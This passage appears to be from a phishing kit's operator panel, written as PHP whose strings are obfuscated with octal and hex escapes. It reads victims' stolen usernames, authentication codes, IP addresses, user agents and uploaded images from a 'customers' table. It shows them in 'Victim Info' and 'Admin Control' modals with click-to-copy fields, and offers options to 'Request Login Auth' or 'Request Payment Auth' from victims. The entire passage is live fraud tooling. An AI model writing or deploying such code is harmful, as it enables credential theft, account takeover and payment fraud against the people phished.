11\11\x9\11\x3c\163\x70\x61\156\76\106\151\x6e\x69\163\150\x3c\57\163\x70\x61\x6e\76\xa\11\x9\11\11\x9\11\11\x9\11\x9\11\11\x9\74\57\x6c\x61\142\145\154\76\12\x9\11\11\x9\x9\x9\11\x9\x9\11\x9\11\74\57\x64\x69\166\76\xa\x9\x9\x9\11\x9\x9\11\11\x9\x9\x9\74\x2f\164\x64\x3e\12\11\11\x9\11\11\11\11\11\11\11\74\57\x74\x72\76\12\12\11\x9\x9\x9\11\x9\x9\11\11\11\xa\11\x9\x9\x9\11\x9\11\x9\x9\74\x2f\164\x62\157\144\x79\x3e\12\11\11\x9\x9\x9\x9\x9\x9\74\x2f\164\141\142\x6c\x65\x3e\xa\x9\x9\x9\x9\x9\x9\11\x3c\57\x64\151\166\76\12\x9\x9\x9\x9\x9\11\11\x3c\41\55\x2d\40\105\156\144\40\143\157\x6d\155\141\x6e\x64\x73\x20\x65\x64\x69\x74\40\x2d\55\x3e\xa\12\x9\11\x9\x9\x9\11\11\x3c\x64\151\x76\x20\143\154\x61\163\163\75\x27\155\x6f\144\141\x6c\x2d\146\x6f\x6f\x74\145\162\x27\40\163\x74\171\154\x65\75\x27\x6d\x61\162\147\x69\x6e\x2d\x74\157\x70\72\55\x34\60\x70\170\x27\x3e\12\x9\x9\x9\11\11\11\11\11\74\142\165\164\x74\x6f\156\40\x74\171\x70\145\75\47\142\x75\164\164\157\156\47\x20\x63\154\141\x73\163\x3d\x27\x62\x74\x6e\x20\142\164\156\55\163\x65\x63\x6f\156\144\x61\162\171\47\40\157\x6e\x63\x6c\x69\x63\153\75\47\x63\x6c\157\x73\145\137\x62\164\x6e\x28\51\47\x20\x64\141\x74\141\55\144\151\163\155\151\163\x73\75\x27\x6d\157\x64\141\x6c\x27\76\103\x6c\157\163\145\74\57\142\x75\164\x74\157\156\76\12\x9\x9\11\11\11\11\x9\x9\74\x62\165\164\164\157\x6e\40\x69\144\x3d\47\x73\141\x76\145\x5f{$value["\151\144"]}\47\40\x6f\x6e\x63\x6c\151\x63\x6b\x3d\47\146\x6f\162\x6d\137\163\165\142\x6d\151\164\50\x74\150\151\x73\x29\47\40\x74\171\x70\145\75\47\x62\x75\x74\x74\x6f\x6e\x27\x20\x63\x6c\x61\163\x73\75\47\142\x74\156\40\142\164\x6e\55\x70\162\x69\x6d\x61\x72\x79\x27\76\123\141\x76\x65\x3c\x2f\142\165\164\x74\x6f\x6e\76\12\x9\x9\x9\x9\x9\x9\11\74\57\144\151\166\76\xa\11\11\11\11\x9\x9\x3c\x2f\x64\151\x76\76\12\11\x9\11\x9\x9\74\x2f\144\x69\166\x3e\xa\x9\11\x9\11\74\57\x66\157\x72\155\76\xa\11\x9\x9\74\x2f\x64\151\x76\76\12\x9\x9\11"; } } if (isset($_GET["\146\x65\164\x63\x68\137\x70\143\x5f\146\x69\x6e\151\163\150\137\155\157\144\x61\x6c\137\144\x61\164\x61"])) { $query = mysqli_query($conn, "\x53\105\x4c\x45\x43\x54\40\x2a\x20\x66\162\157\x6d\40\143\x75\x73\x74\157\x6d\x65\x72\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\x73\162\154\157\x67\x69\x6e"]; $authcode = $value["\x61\x75\x74\150\x63\x6f\144\145"]; $filepath = $value["\x66\x69\x6c\x65\160\x61\x74\x68"]; $ip = $value["\151\160"]; $useragent = urldecode($value["\165\163\145\162\x61\x67\145\x6e\x74"]); $data_log = "\xa\11\x9\x9\x3d\75\75\75\75\x3e\40\x4c\117\107\x49\116\40\x3c\75\75\75\x3d\x3d\xa\x9\x9\11\125\163\145\x72\x6e\141\155\145\40\72\40{$usrlogin}\12\11\11\x9\101\165\164\150\x20\103\157\x64\145\x20\72\x20{$authcode}\xa\x9\11\11\75\75\x3d\75\75\75\75\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\75\75\75\x3d\75\x3d\x3d\xa\11\11\x9\x49\x50\x20\72\40{$ip}\xa\11\x9\11\x55\x41\40\72\x20{$useragent}\12\x9\x9\x9\x3d\75\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\x3d\x3d"; echo "\xa\11\x9\x9\12\11\11\x9\74\x64\151\166\40\x63\154\141\163\163\x3d\47\155\x6f\144\x61\x6c\40\x66\141\x64\x65\x27\x20\x69\144\75\47\166\x69\145\167\x6d\x6f\x64\141\154\137\165\x73\145\162\x69\x64\137{$value["\151\144"]}\x27\40\164\141\142\x69\x6e\x64\x65\x78\75\47\x2d\x31\x27\x20\x72\x6f\x6c\x65\75\47\144\x69\x61\154\157\147\x27\40\x61\x72\151\141\x2d\x6c\141\x62\x65\154\x6c\145\x64\x62\x79\75\x27\145\170\141\155\160\154\145\x4d\157\x64\141\x6c\114\141\142\145\x6c\x27\40\x73\164\x79\154\x65\75\47\x6f\160\141\x63\151\164\171\x3a\61\x20\x21\151\x6d\x70\157\x72\x74\x61\x6e\x74\73\144\151\163\160\x6c\x61\171\x3a\156\x6f\156\145\x3b\x68\145\x69\147\x68\x74\72\x31\x30\x30\45\73\157\166\x65\x72\x66\154\x6f\x77\72\x73\x63\x72\x6f\x6c\x6c\73\47\40\x61\162\151\141\55\150\x69\144\x64\145\x6e\x3d\x27\x74\162\165\145\x27\x3e\12\x9\11\x9\xa\x9\11\11\x9\x3c\146\x6f\x72\155\x20\x6e\141\x6d\x65\x3d\x27\143\157\x6e\x66\x69\x67\x5f\146\x6f\x72\155\137{$value["\x69\x64"]}\x27\40\151\144\x3d\47\x63\x6f\156\146\151\x67\x5f\x66\157\x72\155\x5f{$value["\151\144"]}\47\40\x6d\x65\x74\x68\157\x64\75\47\x50\x4f\x53\124\47\x20\141\x63\x74\x69\x6f\156\x3d\x27\47\x20\x6e\x6f\166\141\154\151\x64\141\164\145\76\12\11\x9\11\11\11\x3c\151\156\x70\x75\164\x20\x74\171\160\145\75\47\150\151\x64\144\x65\x6e\x27\40\x6e\x61\155\145\75\x27\165\163\145\x72\x69\144\x27\x20\x76\141\x6c\x75\x65\75\x27{$value["\151\x64"]}\47\x3e\xa\11\x9\x9\11\11\x3c\x64\x69\166\x20\x63\x6c\141\x73\x73\75\x27\x6d\157\x64\141\154\x2d\144\151\141\x6c\x6f\147\x27\40\162\x6f\x6c\x65\75\x27\144\157\143\x75\155\x65\x6e\164\47\40\163\164\x79\x6c\145\x3d\x27\167\x69\x64\164\x68\72\65\x30\x30\160\170\x27\76\12\11\11\11\x9\11\11\74\x64\x69\166\x20\143\x6c\x61\163\x73\75\x27\x6d\x6f\x64\141\x6c\55\143\x6f\x6e\x74\x65\x6e\164\47\x3e\12\x9\11\11\11\11\11\x9\x3c\x64\x69\x76\40\143\154\x61\x73\x73\x3d\x27\x6d\157\x64\141\x6c\55\150\x65\x61\144\x65\x72\x27\40\x73\164\x79\x6c\145\x3d\x27\x62\x61\143\x6b\x67\x72\157\x75\x6e\144\55\143\x6f\154\x6f\162\x3a\43\63\64\64\71\65\105\73\146\157\156\x74\55\163\151\172\145\x3a\62\56\x37\162\x65\155\73\x74\x65\170\164\55\x61\154\151\x67\x6e\72\143\x65\x6e\164\145\x72\73\x27\76\12\11\x9\x9\x9\x9\11\x9\x9\x3c\x68\65\40\143\x6c\x61\x73\x73\x3d\47\155\157\x64\141\x6c\55\x74\151\x74\154\x65\x27\40\x69\x64\x3d\x27\145\x78\x61\x6d\160\x6c\145\x4d\x6f\x64\141\154\114\x61\142\145\154\x27\x20\163\164\x79\154\145\x3d\x27\143\157\x6c\157\x72\x3a\x77\x68\151\164\145\47\x3e\x56\151\143\x74\151\155\40\111\156\x66\157\x3c\57\150\x35\x3e\xa\11\x9\11\11\x9\x9\11\x9\x3c\x62\165\x74\x74\x6f\x6e\40\164\171\160\x65\x3d\47\142\x75\x74\x74\x6f\156\x27\40\x63\x6c\141\x73\163\75\47\143\154\157\x73\x65\x27\40\x64\141\x74\141\55\x64\151\x73\155\151\163\163\x3d\x27\x6d\157\144\x61\154\x27\x20\x61\x72\x69\141\x2d\x6c\141\142\145\154\75\47\103\x6c\157\x73\x65\47\76\xa\11\x9\x9\11\x9\x9\11\x9\x9\x3c\163\160\x61\156\x20\141\162\x69\141\x2d\x68\x69\144\144\x65\x6e\75\47\x74\x72\165\145\47\40\163\x74\171\x6c\145\x3d\47\143\157\x6c\x6f\162\x3a\167\x68\151\164\145\x27\x3e\x26\x74\151\155\x65\163\x3b\74\57\163\x70\141\x6e\76\12\x9\x9\11\11\11\x9\x9\x9\74\x2f\142\165\164\x74\x6f\156\76\xa\11\x9\x9\11\x9\11\11\74\x2f\x64\151\x76\x3e\12\x9\11\x9\11\11\11\x9\x3c\x64\151\166\x20\143\154\141\x73\163\75\x27\x6d\157\x64\141\x6c\x2d\142\x6f\x64\171\47\76\xa\x9\x9\x9\x9\11\x9\11\11\74\144\x69\x76\x20\143\154\x61\163\x73\x3d\x27\146\x6f\162\x6d\55\x67\x72\x6f\x75\x70\x27\76\12\11\x9\11\11\x9\x9\x9\11\x9\x3c\142\x72\76\12\11\11\x9\x9\x9\11\11\11\x9\74\x74\145\170\x74\x61\162\x65\141\40\151\144\75\47\x74\145\170\x74\141\162\145\x61\x66\x69\156\151\163\x68\x27\40\x63\154\141\163\163\75\47\x66\x6f\x72\x6d\55\x63\157\156\x74\162\x6f\154\47\40\x64\x69\x73\x61\142\154\x65\144\75\47\144\x69\163\x61\x62\154\x65\x64\47\40\x72\157\167\x73\75\x27\x31\62\x27\x3e{$data_log}\x3c\x2f\164\x65\170\164\141\x72\145\x61\x3e\xa\11\11\x9\x9\x9\11\11\11\x9\74\142\x72\x3e\12\x9\x9\x9\x9\x9\11\x9\x9\11\74\143\145\156\x74\145\162\76\x3c\x69\x6d\147\x20\x73\x72\143\75\47{$filepath}\47\40\x77\151\x64\164\x68\75\x27\x31\60\60\160\x78\47\x20\x61\x6c\164\75\47\x6e\157\x20\x69\155\141\x67\x65\x20\164\x6f\40\x64\151\x73\x70\154\141\171\x27\76\x3c\x2f\143\145\x6e\x74\x65\x72\76\xa\x9\11\11\11\x9\x9\x9\x9\74\57\144\x69\166\x3e\xa\x9\11\x9\11\x9\x9\11\74\57\144\151\x76\x3e\xa\x9\11\11\11\x9\x9\x9\x3c\x64\151\x76\40\x63\154\141\163\163\x3d\47\x6d\157\144\x61\x6c\55\146\x6f\x6f\x74\145\162\x27\40\x73\x74\171\154\145\75\x27\x6d\x61\x72\147\x69\x6e\55\164\157\160\x3a\x2d\64\60\160\x78\47\x3e\xa\x9\11\x9\11\x9\x9\x9\11\x3c\x62\165\x74\164\157\156\x20\164\x79\x70\x65\75\47\x62\x75\164\x74\157\156\47\x20\143\154\x61\163\163\75\47\x62\164\x6e\x20\x62\x74\x6e\x2d\x6c\x67\x20\x62\x74\156\55\144\141\162\x6b\x20\x63\x6f\154\55\61\62\x27\x20\157\156\143\x6c\x69\x63\153\x3d\x27\143\x6c\157\x73\145\x5f\142\164\156\x28\x29\x27\x3e\x43\114\x4f\x53\105\x3c\x2f\x62\x75\164\164\157\156\76\xa\x9\11\x9\11\x9\11\11\74\57\144\151\x76\x3e\xa\11\11\11\11\11\11\x3c\57\144\151\x76\x3e\xa\11\11\11\x9\x9\74\x2f\144\151\x76\76\12\x9\x9\11\11\74\57\x66\157\162\x6d\76\xa\11\11\x9\74\57\144\151\x76\76\xa\x9\11\11"; } } if (isset($_GET["\x66\x65\x74\143\150\x5f\155\157\x64\x61\x6c\x5f\x64\141\164\x61"])) { $query = mysqli_query($conn, "\123\105\x4c\x45\x43\124\40\x2a\40\x66\162\x6f\x6d\x20\143\165\x73\x74\x6f\155\145\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\163\162\154\x6f\x67\x69\156"]; $authcode = $value["\x61\x75\164\x68\143\x6f\144\x65"]; $filepath = $value["\x66\x69\154\145\160\x61\x74\x68"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\x75\163\x65\162\141\x67\x65\x6e\164"]); echo "\xa\11\xa\x9\x9\11\74\x64\x69\166\x20\x63\x6c\x61\x73\x73\75\x27\x6d\157\144\x61\x6c\40\146\x61\144\x65\47\40\151\x64\75\x27\x6d\x6f\x64\141\154\137\x75\163\x65\x72\x69\144\x5f{$value["\151\144"]}\x27\40\164\141\x62\151\x6e\144\145\x78\75\47\x2d\61\x27\40\162\157\x6c\x65\75\47\144\x69\141\154\x6f\147\47\40\163\x74\x79\x6c\x65\x3d\x27\157\160\141\x63\151\164\x79\72\x31\40\41\x69\155\160\x6f\162\164\141\156\164\73\144\151\x73\160\x6c\x61\x79\72\x6e\x6f\x6e\145\73\150\145\x69\147\150\164\x3a\61\60\60\x25\x3b\x6f\166\x65\162\146\154\x6f\x77\72\x73\143\162\157\154\x6c\x3b\x27\x20\141\x72\151\x61\55\154\x61\x62\145\154\154\x65\144\x62\171\x3d\x27\x65\170\x61\x6d\160\x6c\x65\x4d\x6f\x64\x61\x6c\114\x61\142\145\x6c\x27\40\141\x72\x69\x61\55\150\x69\144\144\145\x6e\x3d\x27\164\x72\x75\x65\47\76\xa\11\11\11\xa\11\11\11\11\x3c\146\x6f\x72\155\x20\x6e\x61\155\x65\x3d\47\x63\x6f\156\146\151\147\x5f\146\x6f\162\x6d\x5f{$value["\x69\144"]}\x27\40\151\144\75\47\143\157\x6e\x66\x69\147\137\x66\157\x72\x6d\137{$value["\151\144"]}\x27\x20\x6d\x65\164\x68\157\144\x3d\47\120\117\x53\x54\x27\40\x61\143\x74\151\157\156\75\x27\x27\x20\x6e\x6f\x76\x61\154\x69\144\x61\164\145\76\12\x9\11\11\x9\74\x69\x6e\x70\165\164\x20\x74\171\x70\x65\x3d\x27\x68\x69\144\144\x65\x6e\47\40\x6e\x61\x6d\x65\x3d\x27\165\x73\145\x72\151\144\47\40\166\141\x6c\165\145\75\47{$value["\x69\144"]}\x27\x3e\12\x9\x9\x9\11\x3c\x64\151\166\x20\143\154\141\163\x73\75\x27\x6d\157\x64\141\154\x2d\x64\151\141\x6c\157\147\x27\40\x72\157\154\145\x3d\x27\x64\x6f\x63\x75\x6d\145\156\164\x27\x20\x73\x74\x79\x6c\145\x3d\x27\x6d\x61\x72\x67\151\156\55\x74\x6f\160\x3a\62\x30\x25\73\x6d\x61\x78\x2d\x77\151\144\x74\150\72\61\x30\60\x25\x3b\x66\x6f\x6e\164\x2d\163\151\172\145\72\61\56\x32\x72\145\155\x3b\47\76\xa\x9\11\x9\11\74\144\x69\x76\x20\143\x6c\x61\x73\x73\75\x27\155\x6f\144\x61\154\x2d\143\x6f\x6e\x74\x65\x6e\164\47\40\163\x74\171\x6c\145\x3d\47\x62\x61\x63\153\147\x72\157\165\156\144\x2d\143\x6f\x6c\x6f\x72\72\x20\142\154\x61\x63\x6b\73\47\76\12\x9\x9\x9\11\x9\74\x64\151\166\x20\143\154\141\x73\x73\x3d\47\155\x6f\x64\x61\x6c\x2d\150\145\x61\x64\x65\162\47\x20\x73\x74\171\154\145\75\x27\142\141\x63\153\147\x72\x6f\165\156\144\55\x63\x6f\x6c\157\x72\72\x23\x33\x34\64\x39\65\105\73\x66\157\x6e\x74\x2d\163\151\172\145\72\62\56\67\162\145\x6d\73\164\x65\170\x74\55\141\154\x69\147\156\72\x63\x65\156\x74\x65\x72\73\47\x3e\xa\11\x9\11\x9\11\x3c\x68\65\40\x63\x6c\x61\x73\x73\75\x27\x6d\157\x64\x61\154\55\164\x69\x74\x6c\145\47\x20\x69\x64\x3d\x27\145\170\x61\x6d\160\154\145\115\x6f\144\x61\154\114\x61\x62\x65\154\x27\x20\163\164\x79\154\145\x3d\47\143\157\154\x6f\x72\72\x77\150\x69\x74\x65\73\146\x6f\x6e\164\x2d\x73\x69\x7a\x65\72\x31\x2e\x32\x72\145\x6d\47\x3e\x41\x64\x6d\151\x6e\40\x43\x6f\156\x74\x72\x6f\x6c\40\50\x63\x6c\x69\x63\x6b\x20\157\x6e\40\154\157\x67\x20\x74\157\x20\141\x75\164\157\x2d\143\157\x70\x79\x29\74\x2f\x68\x35\76\12\11\x9\11\x9\x9\74\142\165\x74\164\157\156\40\164\x79\x70\x65\75\47\x62\165\x74\164\157\156\47\x20\x63\154\141\x73\163\x3d\47\x63\x6c\x6f\163\145\47\40\x6f\x6e\143\154\x69\x63\153\x3d\47\x63\x6c\157\x73\145\137\142\164\x6e\x28\51\x27\x20\x20\141\162\x69\x61\55\x6c\141\x62\145\154\75\47\x43\x6c\157\163\x65\47\76\12\11\x9\11\x9\11\11\x3c\163\x70\x61\156\x20\141\162\151\x61\x2d\150\x69\x64\x64\145\156\75\x27\x74\162\x75\x65\47\40\163\x74\x79\154\145\x3d\47\x63\x6f\x6c\x6f\162\72\x77\x68\151\x74\x65\x27\x3e\x26\x74\x69\x6d\x65\163\73\74\x2f\x73\160\x61\156\76\xa\x9\x9\11\x9\11\74\57\142\165\164\164\x6f\x6e\x3e\xa\x9\x9\x9\11\x9\x3c\57\144\151\166\x3e\xa\x9\11\x9\x9\11\74\144\x69\x76\x20\143\x6c\141\163\x73\x3d\47\x6d\157\x64\x61\154\55\x62\157\x64\x79\x27\76\xa\x9\11\x9\xa\x9\11\x9\11\11\74\144\151\166\x20\x63\x6c\141\x73\x73\75\x27\x66\157\x72\x6d\55\x67\x72\x6f\x75\160\x27\x20\x73\164\x79\154\145\x3d\x27\155\x61\x72\147\x69\156\x2d\142\157\x74\164\157\x6d\x3a\61\162\x65\x6d\47\76\12\11\x9\x9\x9\11\x9\x3c\142\x72\x3e\xa\11\11\11\x9\x9\x9\x3c\143\145\156\x74\x65\162\x3e\x3c\x69\155\x67\40\163\162\x63\75\47{$filepath}\x27\x20\163\x74\171\x6c\145\x3d\x27\167\151\144\x74\x68\72\x37\60\x70\x78\73\142\x6f\x72\x64\145\162\x2d\x72\141\x64\151\x75\163\72\x31\x30\x70\170\47\x20\141\154\164\x3d\x27\x6e\157\40\x69\155\141\147\145\x20\x74\x6f\40\144\151\x73\x70\x6c\141\x79\47\x3e\x3c\x2f\x63\x65\x6e\164\145\162\x3e\12\x9\x9\11\11\x9\x9\74\142\x72\x3e\xa\xa\11\x9\11\11\11\11\74\144\151\x76\40\143\154\x61\163\x73\x3d\x27\144\x61\x74\141\x2d\x67\162\157\x75\160\x27\76\12\11\11\x9\x9\11\x9\x9\74\154\141\x62\145\154\x20\143\x6c\x61\163\x73\75\47\144\x61\x74\x61\x2d\154\x61\142\x65\154\47\x3e\125\163\x65\x72\156\141\155\x65\74\x2f\x6c\141\142\x65\x6c\x3e\12\11\x9\x9\x9\x9\x9\x9\x3c\151\156\160\x75\164\40\x6f\156\x63\154\151\x63\153\x3d\x27\x63\x6f\160\x79\x5f\x62\164\x6e\50\164\x68\151\163\x29\47\x20\x63\x6c\141\x73\163\x3d\47\146\157\x72\x6d\x2d\x63\157\156\164\162\x6f\154\x27\40\162\x65\x61\144\157\x6e\x6c\x79\x20\x76\141\154\x75\x65\x3d\47{$usrlogin}\x27\76\xa\11\11\x9\x9\x9\x9\74\57\144\151\x76\x3e\12\x9\x9\x9\x9\11\11\x3c\x64\151\166\x20\143\x6c\141\x73\x73\x3d\47\x64\x61\164\x61\55\147\162\157\x75\160\x27\76\12\x9\x9\11\x9\x9\11\x9\74\154\141\142\x65\x6c\40\143\154\x61\163\163\75\x27\144\x61\x74\x61\x2d\154\x61\x62\145\x6c\47\76\101\165\164\150\40\103\x6f\144\145\74\x2f\x6c\141\142\x65\x6c\x3e\xa\x9\x9\x9\x9\11\x9\11\x3c\151\156\160\x75\164\40\157\x6e\x63\x6c\151\143\153\75\x27\143\157\x70\x79\137\x62\x74\156\50\164\x68\x69\163\51\x27\40\143\154\x61\x73\163\x3d\x27\146\x6f\162\155\x2d\x63\x6f\156\x74\x72\x6f\x6c\47\40\162\x65\141\144\157\x6e\x6c\171\x20\x76\x61\154\x75\x65\75\47{$authcode}\x27\76\xa\11\11\x9\11\x9\x9\74\x2f\x64\x69\166\x3e\xa\11\11\x9\x9\11\11\x3c\144\151\166\x20\143\x6c\x61\163\163\x3d\47\144\x61\164\141\x2d\x67\162\x6f\165\160\47\x3e\xa\x9\11\11\x9\x9\x9\x9\x3c\154\141\x62\x65\154\x20\143\x6c\141\163\163\75\47\144\141\164\141\55\154\141\142\x65\x6c\x27\76\x49\120\57\104\145\166\x69\143\x65\x3c\x2f\x6c\x61\142\145\154\x3e\xa\11\x9\11\11\x9\x9\x9\74\151\x6e\160\x75\x74\40\157\156\143\x6c\x69\x63\x6b\75\x27\143\157\x70\171\x5f\142\x74\x6e\50\164\150\151\163\51\x27\x20\x63\x6c\x61\x73\x73\x3d\47\x66\x6f\162\x6d\55\x63\157\156\x74\x72\x6f\154\47\40\162\145\x61\144\x6f\x6e\154\171\40\166\x61\x6c\165\x65\x3d\47{$ip}\x20\x5b{$useragent}\135\47\76\12\11\11\x9\x9\11\x9\x3c\57\x64\151\x76\76\12\x9\x9\11\x9\11\x9\x3c\142\x72\x3e\12\11\x9\x9\x9\11\74\57\144\151\166\x3e\xa\11\11\11\11\11\xa\11\11\x9\11\x9\x3c\41\x2d\x2d\x20\x45\116\104\40\55\x2d\x3e\12\11\x9\11\x9\x9\xa\x9\11\x9\11\11\x3c\x74\141\142\x6c\x65\40\163\x74\171\154\145\75\x27\167\x69\x64\164\x68\72\x20\x31\60\60\45\x3b\x62\141\x63\x6b\x67\162\x6f\165\x6e\144\x2d\143\157\x6c\157\162\x3a\x20\142\x6c\x61\x63\x6b\x3b\143\157\154\157\x72\x3a\40\167\150\x69\164\145\x3b\x70\141\144\144\151\x6e\x67\72\x20\61\x30\45\x3b\x27\76\xa\x9\x9\x9\x9\11\x9\74\x74\142\x6f\144\171\x20\163\x74\171\x6c\x65\x3d\47\154\151\x6e\x65\x2d\150\x65\x69\147\150\164\x3a\x31\60\60\45\73\47\76\12\11\11\11\11\x9\11\11\xa\x9\x9\x9\x9\11\x9\11\x3c\x74\162\x3e\xa\x9\11\11\x9\11\11\x9\11\x3c\x74\x64\x3e\12\11\x9\11\x9\11\11\11\x9\x9\x3c\144\x69\166\x20\x63\x6c\141\x73\163\x3d\x27\146\157\x72\x6d\x2d\143\x68\x65\x63\153\x27\76\12\x9\x9\11\11\11\x9\11\x9\x9\11\x3c\x6c\x61\x62\x65\x6c\40\146\x6f\x72\x3d\x27\x61\163\x6b\143\x68\141\162\163\x72\141\144\151\157\x30{$value["\151\144"]}\47\x20\143\x6c\141\x73\x73\75\47\146\x6f\162\x6d\x2d\143\x68\145\143\153\x2d\x6c\x61\142\145\x6c\x27\76\xa\x9\x9\11\11\x9\11\x9\x9\11\x9\11\x3c\x69\156\160\x75\164\x20\164\171\x70\x65\x3d\x27\x72\x61\x64\x69\157\x27\40\156\x61\x6d\145\75\x27\163\164\x61\x74\x75\x73\47\x20\x76\141\x6c\165\x65\75\47\61\61\47\40\151\x64\x3d\47\141\163\x6b\x63\x68\141\x72\x73\x72\x61\x64\x69\x6f\x30{$value["\x69\144"]}\x27\x20\157\x6e\x63\x6c\151\143\x6b\75\x27\x73\150\x6f\167\x66\151\145\154\x64\x73\50{$value["\151\144"]}\x29\x3b\47\x20\143\x6c\141\163\163\x3d\47\163\x74\141\164\x75\163\40\x66\157\162\x6d\x2d\x63\x68\145\x63\x6b\55\151\x6e\160\x75\164\47\x3e\xa\x9\11\11\11\x9\x9\11\x9\x9\11\11\74\163\160\x61\x6e\76\x52\x65\161\165\145\163\x74\40\114\x6f\147\x69\x6e\40\x41\x75\x74\150\74\x2f\163\160\x61\156\76\12\x9\x9\11\11\11\x9\x9\11\11\x9\x3c\57\154\x61\142\x65\154\x3e\xa\x9\11\11\11\x9\x9\11\11\x9\74\x2f\144\151\166\x3e\12\x9\x9\11\11\11\x9\x9\x9\x9\74\41\x2d\x2d\40\111\x6e\160\165\164\40\x63\150\141\162\x61\143\x74\x65\x72\x73\40\x2d\55\x3e\xa\x9\x9\x9\11\11\x9\x9\x9\11\x3c\144\x69\166\x20\143\154\x61\163\x73\75\47\x66\x6f\162\x6d\55\147\162\157\x75\160\47\40\163\164\171\x6c\x65\75\x27\144\x69\x73\x70\154\x61\171\72\156\x6f\x6e\145\73\47\x20\x69\x64\75\47\141\x73\153\x63\150\141\162\163\x30{$value["\x69\144"]}\x27\76\12\x9\11\11\x9\x9\11\11\x9\11\11\74\x64\x69\x76\40\143\154\141\x73\x73\75\47\162\x6f\x77\47\40\163\164\x79\x6c\x65\75\x27\155\141\162\x67\x69\x6e\55\154\x65\146\x74\72\x35\45\x3b\155\141\162\x67\151\x6e\55\x74\157\160\x3a\x35\160\170\47\40\x3e\12\x9\x9\x9\x9\11\11\x9\x9\11\x9\11\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\47\x63\157\154\47\x3e\12\x9\x9\11\x9\x9\x9\11\x9\11\11\11\11\x3c\x69\x6e\x70\165\164\x20\x74\171\x70\145\75\47\164\145\170\164\47\x20\x63\x6c\x61\x73\163\x3d\x27\146\x6f\162\155\x2d\x63\157\156\164\x72\x6f\x6c\x27\x20\x70\x6c\141\x63\x65\x68\157\x6c\x64\145\162\x3d\47\105\x6e\164\x65\162\40\143\157\144\x65\40\x68\145\x72\x65\x27\x20\x6e\x61\x6d\x65\75\x27\141\165\x74\150\x63\x6f\144\145\47\x20\x69\x64\x3d\x27\x61\165\164\150\143\x6f\x64\145\x27\x20\163\164\171\x6c\145\x3d\47\x77\x69\x64\x74\x68\x3a\x38\60\x25\x3b\x62\157\x72\144\x65\162\x2d\143\x6f\x6c\x6f\162\x3a\43\144\x36\x64\x36\x65\65\x27\76\12\11\x9\11\x9\x9\x9\11\x9\x9\11\11\74\x2f\x64\151\x76\76\xa\11\x9\x9\11\x9\11\11\x9\x9\11\x3c\57\x64\x69\166\76\xa\11\11\11\x9\x9\x9\11\x9\x9\74\x2f\x64\x69\x76\x3e\12\x9\x9\x9\x9\11\11\11\11\74\x2f\x74\144\x3e\xa\x9\x9\x9\11\11\x9\x9\11\x3c\164\144\x3e\xa\11\x9\x9\x9\x9\x9\x9\11\x9\74\x64\x69\x76\40\x63\154\x61\x73\x73\x3d\47\146\157\162\x6d\55\143\x68\x65\x63\x6b\x27\x3e\xa\x9\11\x9\11\x9\x9\x9\x9\11\11\x3c\154\x61\x62\145\x6c\40\146\157\x72\x3d\x27\141\x73\153\143\x68\x61\162\x73\162\141\x64\x69\x6f\61{$value["\151\x64"]}\47\x20\x63\154\141\x73\x73\x3d\47\146\x6f\x72\x6d\x2d\x63\x68\145\143\153\x2d\x6c\x61\142\x65\154\47\x3e\xa\x9\11\x9\11\11\11\11\x9\11\x9\11\74\151\x6e\160\165\164\x20\164\x79\160\145\75\47\162\x61\x64\x69\x6f\x27\40\156\x61\155\145\75\47\163\x74\x61\164\x75\x73\47\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x32\x27\x20\x69\x64\75\47\141\x73\x6b\x63\150\141\162\x73\x72\141\144\151\x6f\61{$value["\x69\x64"]}\x27\40\x6f\x6e\143\x6c\x69\x63\x6b\75\47\x73\x68\157\167\x66\151\145\x6c\144\x73\x28{$value["\151\x64"]}\x29\x3b\47\40\x63\154\141\163\x73\x3d\x27\163\x74\x61\x74\x75\x73\40\146\x6f\x72\x6d\x2d\143\x68\x65\x63\x6b\55\x69\x6e\x70\x75\x74\47\76\12\11\x9\x9\11\11\x9\x9\x9\x9\x9\x9\74\x73\x70\141\x6e\x3e\x52\x65\161\x75\145\163\164\x20\120\x61\171\155\145\156\164\40\101\165\164\x68\x3c\x2f\x73\x70\141\x6e\x3e\12\11\11\x9\11\11\x9\x9\x9\11\11\x3c\57\154\x61\142\145\x6c\x3e\xa\x9\x9\11\x9\x9\11\x9\11\11\x3c\x2f\144\151\x76\x3e\xa\11\x9\x9\x9\x9\x9\11\11\x3c\57\164\x64\x3e\12\x9\11\11\x9\x9\x9\11\x3c\57\164\x72\76\xa\xa\x9\x9\11\11\11\x9\x9\x3c\x74\x72\x3e\xa\11\x9\11\11\x9\11\x9\11\74\x74\144\76\12\11\x9\11\x9\11\x9\11\11\x9\x3c\144\151\166\40\143\x6c\x61\x73\163\x3d\47\146\157\x72\x6d\x2d\x63\150\145\x63\x6b\x27\x3e\12\x9\11\11\x9\x9\x9\11\11\11\11\x3c\154\141\142\x65\x6c\x20\x66\157\162\75\47\x61\163\153\x63\x68\141\x72\x73\x72\x61\144\x69\x6f\x32{$value["\x69\x64"]}\x27\x20\x63\x6c\x61\x73\163\75\47\x66\x6f\x72\x6d\55\143\150\x65\x63\153\x2d\154\x61\x62\145\154\47\x3e\xa\x9\x9\x9\11\x9\11\x9\11\x9\11\x9\74\x69\x6e\160\165\x74\x20\164\x79\x70\145\75\x27\162\141\144\151\157\47\x20\x6e\x61\x6d\145\x3d\x27\163\x74\141\164\x75\163\47\40\x76\141\x6c\165\x65\75\x27\x31\63\47\40\151\144\75\47\x61\x73\x6b\x63\x68\x61\162\163\x72\x61\x64\x69\x6f\x32{$value["\151\x64"]}\47\x20\x6f\x6e\x63\x6c\x69\143\x6b\75\x27\163\x68\157\167\146\151\x65\154\144\x73\x28{$value["\x69\144"]}\x29\x3b\47\x20\x63\x6c\141\x73\x73\75\47\163\x74\141\164\x75\163\x20\146\157\x72\x6d\x2d\x63\150\145\143\153\x2d\x69\x6e\x70\x75\x74\47\76\xa\x9\11\x9\11\11\x